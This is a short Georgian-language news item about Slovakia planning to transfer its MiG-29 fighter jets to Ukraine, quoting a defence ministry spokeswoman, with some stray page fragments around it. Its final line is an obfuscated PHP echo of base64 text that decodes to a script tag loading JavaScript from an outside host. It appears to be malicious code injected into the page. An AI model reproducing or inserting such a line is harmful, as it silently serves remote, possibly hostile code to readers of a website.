celsiusi
ავერსი შნაიდერი
სლოვაკეთი უკრაინისთვის საკუთარი „მიგ-29”-ის ავიაგამანადგურებლების გადაცემას გეგმავს. აღნიშნულის შესახებ სლოვაკეთის თავდაცვის სამინისტროს პრესმდივანმა, მარტინა კოვალკაშიკოვამ განაცხადა. ინფორმაციას  „ბიბისი” ავრცელებს.
 
„ჩვენი ინტერესი მდგომარეობს იმაში, რომ ეს თვითმფრინავები უკრაინაში გაიგზავნოს. შესაბამისად, შესაძლებელია ისეთი სცენარიც, რომ სლოვაკეთი უკრაინას თვითმფრინავებს მიაწვდის და ევროკავშირისგან მიიღებს მათი ღირებულების საფასურს, რაც აუცილებელია ჩვენი ქვეყნის თავდაცვისთვის”, – განაცხადა პრესმდივანმა.
 
კოვალკაშიკოვას ავიაგამანადგურებლების რაოდენობა არ დაუკონკრეტებია, თუმცა როგორც „ბიბისი” წერს, სლოვაკეთის განკარგულებაშია 12-მდე „მიგ-29”-ის ავიაგამანადგურებელი.
574
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");